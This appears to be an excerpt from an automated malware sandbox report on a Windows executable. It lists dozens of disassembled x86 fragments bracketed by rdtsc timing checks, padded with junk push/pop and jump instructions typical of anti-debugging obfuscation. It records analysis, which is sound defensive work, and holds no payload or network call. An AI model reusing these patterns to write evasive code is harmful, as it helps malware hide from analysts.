Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3E051 second address: D3E06B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3E06B second address: D3E06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D3E305 second address: D3E30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D44454 second address: D4445A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4445A second address: D4445E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AD04 second address: D4AD0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AD0A second address: D4AD25 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7620C9DE4Dh 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AD25 second address: D4AD48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC883h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F7620BAC87Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D499B8 second address: D499D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F7620C9DE46h 0x0000000c jnp 00007F7620C9DE46h 0x00000012 jg 00007F7620C9DE46h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49AFD second address: D49B07 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49B07 second address: D49B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE53h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49B20 second address: D49B2A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7620BAC876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49F7E second address: D49F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49F84 second address: D49F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49F88 second address: D49F9D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7620C9DE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F7620C9DE46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49F9D second address: D49FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F7620BAC87Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A238 second address: D4A246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7620C9DE46h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A3BC second address: D4A3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC888h 0x00000009 pop edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A3DC second address: D4A3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A3E5 second address: D4A3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4A588 second address: D4A5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE54h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AB86 second address: D4AB92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007F7620BAC876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AB92 second address: D4AB98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AB98 second address: D4AB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4AB9C second address: D4ABA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D493F6 second address: D49419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F7620BAC876h 0x0000000e jmp 00007F7620BAC882h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D49419 second address: D4943C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620C9DE56h 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F7620C9DE46h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D4E5FB second address: D4E604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D12AF9 second address: D12B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE4Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D12B0A second address: CEC4CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc ch, 0000007Eh 0x0000000c call dword ptr [ebp+122D18D9h] 0x00000012 push esi 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop esi 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D130A2 second address: D130A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D138AF second address: D138B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D138B6 second address: D13908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, 5C41BC7Fh 0x00000011 push 0000001Eh 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7620C9DE48h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 jmp 00007F7620C9DE52h 0x00000036 pop esi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13A6E second address: D13A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13A78 second address: D13A87 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13A87 second address: D13A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13A8B second address: D13A91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13BCB second address: D13BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7620BAC883h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13BE8 second address: D13C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620C9DE55h 0x00000008 jmp 00007F7620C9DE4Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jbe 00007F7620C9DE46h 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13CC0 second address: D13CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13CC6 second address: D13CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jp 00007F7620C9DE4Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13CDD second address: D13CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13CE3 second address: D13D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F7620C9DE48h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 xor ecx, dword ptr [ebp+122D2B4Dh] 0x00000027 lea eax, dword ptr [ebp+12485899h] 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F7620C9DE48h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov ecx, dword ptr [ebp+122D2B41h] 0x0000004d jo 00007F7620C9DE5Fh 0x00000053 call 00007F7620C9DE58h 0x00000058 pop edi 0x00000059 nop 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13D63 second address: D13DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b jmp 00007F7620BAC87Ah 0x00000010 jnc 00007F7620BAC876h 0x00000016 popad 0x00000017 pop ecx 0x00000018 nop 0x00000019 push ecx 0x0000001a mov ecx, dword ptr [ebp+122D3BFDh] 0x00000020 pop edx 0x00000021 lea eax, dword ptr [ebp+12485855h] 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F7620BAC878h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 call 00007F7620BAC885h 0x00000046 mov dl, D5h 0x00000048 pop edx 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F7620BAC888h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D4E8DA second address: D4E8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D4EE48 second address: D4EE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7620BAC876h 0x0000000a ja 00007F7620BAC876h 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D4EE64 second address: D4EE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D4EE6A second address: D4EE74 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7620BAC876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D54205 second address: D5420B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D5420B second address: D5420F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D5420F second address: D54218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D54218 second address: D54236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7620BAC87Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D54236 second address: D54249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7620C9DE4Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D544E5 second address: D544E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D544E9 second address: D54506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F7620C9DE51h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D546DD second address: D546E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D546E3 second address: D546ED instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7620C9DE46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D54B49 second address: D54B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC885h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D54B67 second address: D54B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D57EC2 second address: D57EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D57BB3 second address: D57BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D57BB9 second address: D57BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7620BAC876h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D5C2D2 second address: D5C2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D5C2DC second address: D5C2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D643F8 second address: D64402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D62C6E second address: D62C8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC884h 0x00000007 jbe 00007F7620BAC876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D62C8C second address: D62C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7620C9DE46h 0x0000000a jo 00007F7620C9DE46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D62C9C second address: D62CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC885h 0x00000007 jp 00007F7620BAC876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F7620BAC888h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D63286 second address: D632A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F7620C9DE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D63420 second address: D6344D instructions: 0x00000000 rdtsc 0x00000002 js 00007F7620BAC876h 0x00000008 jmp 00007F7620BAC885h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F7620BAC87Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D13722 second address: D13727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D64139 second address: D64152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D66EA2 second address: D66EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7620C9DE46h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D671D8 second address: D671E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7620BAC876h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D671E5 second address: D671EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D671EB second address: D67221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7620BAC889h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D6BFFB second address: D6C044 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7620C9DE4Ch 0x00000008 jp 00007F7620C9DE46h 0x0000000e jmp 00007F7620C9DE52h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jnl 00007F7620C9DE79h 0x0000001b jmp 00007F7620C9DE59h 0x00000020 push eax 0x00000021 push edx 0x00000022 jnc 00007F7620C9DE46h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D73BC9 second address: D73BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D73BCF second address: D73BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D73BD3 second address: D73BE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D73BE3 second address: D73BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7620C9DE51h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D741B8 second address: D741D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7620BAC889h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D741D9 second address: D741F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE53h 0x00000007 jo 00007F7620C9DE46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D7452D second address: D7455D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7620BAC880h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7620BAC885h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D74AF4 second address: D74B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007F7620C9DE46h 0x0000000c popad 0x0000000d pushad 0x0000000e jc 00007F7620C9DE4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D74B0A second address: D74B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F7620BAC876h 0x0000000c rdtsc
